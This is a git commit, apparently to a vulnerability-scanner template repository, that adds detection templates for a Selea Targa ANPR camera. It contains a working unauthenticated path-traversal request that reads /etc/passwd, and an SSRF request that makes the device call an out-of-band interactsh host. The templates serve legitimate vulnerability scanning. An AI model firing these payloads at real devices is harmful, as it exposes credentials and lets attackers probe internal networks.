Merge pull request #2164 from gy741/rule-add-v37

Add Selea Targa IP OCR-ANPR Camera Multiple Vulnerabilities
2021-07-26 02:36:40 +05:30 · 2021-07-26 02:36:40 +05:30 · ea8a469b9e
parent 1a21d46bd9 e5c97aa2d7
commit ea8a469b9e
3 changed files with 569 additions and 1 deletions
--- a/iot/targa-camera-lfi.yaml
+++ b/iot/targa-camera-lfi.yaml
@ -0,0 +1,25 @@
+id: targa-camera-lfi
+
+info:
+  name: Selea Targa IP OCR-ANPR Camera - Unauthenticated Directory Traversal
+  author: gy741
+  severity: high
+  description: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker to disclose clear-text credentials resulting in authentication bypass.
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php
+  tags: targa,lfi,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
--- a/iot/targa-camera-ssrf.yaml
+++ b/iot/targa-camera-ssrf.yaml
@ -0,0 +1,29 @@
+id: targa-camera-ssrf
+
+info:
+  name: Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF
+  author: gy741
+  severity: high
+  description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application.
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php
+  tags: targa,ssrf,oob,iot
+
+requests:
+  - raw:
+      - |
+        POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        content-type: application/json
+        Accept: */*
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-US,en;q=0.9
+        Connection: close
+
+        {"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://{{interactsh-url}}","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
--- a/technologies/favicon-detection.yaml
+++ b/technologies/favicon-detection.yaml